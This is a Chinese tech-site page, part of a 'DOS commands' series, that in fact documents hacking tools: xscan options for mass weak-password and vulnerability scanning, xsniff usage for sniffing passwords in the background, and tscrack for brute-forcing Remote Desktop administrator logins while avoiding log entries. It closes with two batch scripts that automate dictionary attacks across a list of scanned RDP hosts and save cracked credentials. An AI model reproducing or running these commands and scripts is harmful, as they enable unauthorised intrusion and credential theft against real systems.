系统吧 专业的电脑操作系统,支持重装各种原版系统xp/win7/win8/win10 这个系统怎么样?试试系统吧系统,体验办公系统畅快愉悦感。 各种电脑系统安装过程一样,神一般的畅快!
-->
当前位置:主页 > xp >

windows dos常用命令大全详解(7)

作者:孙铁艳 分类:xp 发布时间:2021-05-27 11:16:07

[其他选项] 扫锚"主机IP列表文件名"中的所有主机信息  检测项目  -active 检测主机是否存活  -os 检测远程操作系统类型(通过NETBIOS和SNMP协议)  -port 检测...

<检测项目> [其他选项] 扫锚"主机IP列表文件名"中的所有主机信息 

检测项目 

-active 检测主机是否存活 

-os 检测远程操作系统类型(通过NETBIOS和SNMP协议) 

-port 检测常用服务的端口状态 

-ftp 检测FTP弱口令 

-pub 检测FTP服务匿名用户写权限 

-pop3 检测POP3-Server弱口令 

-smtp 检测SMTP-Server漏洞 

-sql 检测SQL-Server弱口令 

-smb 检测NT-Server弱口令 

-iis 检测IIS编码/解码漏洞 

-cgi 检测CGI漏洞 

-nasl 加载Nessus攻击脚本 

-all 检测以上所有项目 

其它选项 

-i 适配器编号 设置网络适配器, <适配器编号>可通过"-l"参数获取 

-l 显示所有网络适配器 

-v 显示详细扫描进度 

-p 跳过没有响应的主机 

-o 跳过没有检测到开放端口的主机 

  -t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默认数量为100,10 

-log 文件名 指定扫描报告文件名 (后缀为:TXT或HTML格式的文件) 

用法示例 

xscan -host 192.168.1.1-192.168.255.255 -all -active -p  检测192.168.1.1-192.168.255.255网段内主机的所有漏洞,跳过无响应的主机 

xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测192.168.1.1-192.168.255.255网段内主机的标准端口状态,NT弱口令用户,最大并发线程数量为150,跳过没有检测到开放端口的主机 

xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测"hostlist.txt"文件中列出的所有主机的标准端口状态,CGI漏洞,最大并发线程数量为200,同一时刻最多检测5台主机,显示详细检测进度,跳过没有检测到开放端口的主机 

3、命令行方式嗅探器: xsniff.exe

可捕获局域网内FTP/SMTP/POP3/HTTP协议密码

参数说明 

-tcp 输出TCP数据报 

-udp 输出UDP数据报 

-icmp 输出ICMP数据报 

-pass 过滤密码信息 

-hide 后台运行 

-host 解析主机名 

-addr IP地址 过滤IP地址 

-port 端口 过滤端口 

-log 文件名 将输出保存到文件 

-asc 以ASCII形式输出 

-hex 以16进制形式输出 

用法示例 

xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中 

xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出 

4、终端服务密码破解: tscrack.exe

参数说明 

-h 显示使用帮助 

-v 显示版本信息 

-s 在屏幕上打出解密能力 

-b 密码错误时发出的声音 

-t 同是发出多个连接(多线程) 

-N Prevent System Log entries on targeted server 

-U 卸载移除tscrack组件 

-f 使用-f后面的密码 

-F 间隔时间(频率) 

-l 使用-l后面的用户名 

-w 使用-w后面的密码字典 

-p 使用-p后面的密码 

-D 登录主页面 

用法示例 

tscrack 192.168.0.1 -l administrator -w pass.dic 远程用密码字典文件暴破主机的administrator的登陆密码 

tscrack 192.168.0.1 -l administrator -p 123456 用密码123456远程登陆192.168.0.1的administrator用户 

@if not exist ipcscan.txt goto noscan 

@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i 

nscan 

@echo 3389.txt no find or scan faild 

(①存为3389.bat) (假设现有用SuperScan或其它扫锚器扫到一批开有3389的主机IP列表文件3389.txt) 

3389.bat意思是:从3389.txt文件中取一个IP,接着运行hack.bat 

@if not exist tscrack.exe goto noscan 

@tscrack %1 -l administrator -w pass.dic >>rouji.txt 

:noscan 

@echo tscrack.exe no find or scan faild 

(②存为hack.bat) (运行3389.bat就OK,且3389.bat、hack.bat、3389.txt、pass.dic与tscrack.exe在同一个目录下;就可以等待结果了) 

xp 更多>>
win7 更多>>
win8 更多>>
win10 更多>>
U盘 更多>>
电脑技术 更多>>
网站地图 | 豫ICP备2021035069号-4 | 友情链接qq:191064436
系统吧

版权所有 © 2012-2023 系统吧 免责声明:本站资源均收集于互联网,其著作权归原作者所有,如果有侵犯您权利的资源,请来信告知,我们将及时删除相应资源。